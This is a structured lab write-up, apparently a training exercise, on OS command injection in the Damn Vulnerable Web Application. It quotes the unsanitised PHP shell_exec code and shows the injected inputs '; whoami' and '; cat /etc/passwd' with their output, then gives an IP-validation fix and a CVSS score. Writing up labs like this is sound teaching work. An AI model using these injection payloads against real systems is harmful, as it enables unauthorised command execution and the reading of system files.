## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Vulnerable Web Application (DVWA)
  Location:
    http://192.168.0.68/vulnerabilities/exec/
  CWE:
    CWE-0078: Improper Neutralization of Special
    Elements used in an OS Command ('OS Command Injection') -base-
      https://cwe.mitre.org/data/definitions/78.html
    CWE 1027: Injection -category-
      https://cwe.mitre.org/data/definitions/1027.html
    CWE-0077: Improper Neutralization of Special Elements used in a Command
    ('Command Injection') -class-
      https://cwe.mitre.org/data/definitions/77.html
  CAPEC:
    CAPEC-088: OS Command Injection -standard-
      http://capec.mitre.org/data/definitions/88.html
    CAPEC-248: Command Injection -meta-
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Execute OS commands from webpage
  Recommendation:
    Sanitize inputs to prevent command injections.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ParrotSec       | 4.18.0      |
    | Google Chrome   | 71.0.3578   |
  TOE information:
    Given I am accessing the site http://192.168.0.68/vulnerabilities/exec/
    And enter a php site that allows me to execute OS commands
    And PHP version 7.0.30

  Scenario: Normal use case
  The system takes an IP as input and returns a ping output.
    Given I access http://192.168.0.68
    And open http://192.168.0.68/vulnerabilities/exec/
    Then I can see [evidence 1](evidence1.png)

  Scenario: Static detection
  The PHP code does not sanitize the input data
    When I look at the source code
    Then I can see that the vulnerability is located in line 8 to line 14
    """
    8 if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    9    // Windows
    10    $cmd = shell_exec( 'ping  ' . $target );
    11 }
    12 else {
    13    // *nix
    14    $cmd = shell_exec( 'ping  -c 4 ' . $target );
    15 }
    """
    Then I can conclude that I can execute OS commands.

  Scenario: Dynamic detection
  The page allows OS commands execution
    When I access http://192.168.0.68/vulnerabilities/exec/
    Then I get [evidence 2](evidence2.png)
    Then I can execute the following command:
    """
    ; whoami
    """
    Then I get the output:
    """
    www-data
    """
    Then I can conclude that the OS command worked and the system returned.

  Scenario: Exploitation
  Sending OS commands to display sensitive information.
    Given the program does not sanitize the input
    Then I can execute the following command:
    """
    ; cat /etc/passwd
    """
    Then I get the output:
    """
    root:x:0:0:root:/root:/bin/bash
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
    """
    Then I can conclude that I successfully read from passwd file.

  Scenario: Remediation
  The PHP code can be fixed by sanitizing the input.
    Given I have patched the code by doing a sanitation input.
    """
    if( isset( $_POST[ 'Submit' ]  ) ) {
    $target = $_REQUEST[ 'ip' ];
    if (filter_var($target, FILTER_VALIDATE_IP)) {
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            $cmd = shell_exec( 'ping  ' . $target );
        } else {
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }
    } else {
        $cmd="Invalid IP";
    }
    """
    Then If I re-run my exploit {C} with command:
    """
    ; cat /etc/passwd
    """
    Then I get:
    """
    Invalid IP
    """
    Then I can confirm that the vulnerability was successfully patched.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (high) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.4/10 (low) - E:H/RL:W/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.2/10 (Medium) - CR:L/IR:L/AR:X

  Scenario: Correlations
  No correlations have been found to this date 2019-01-29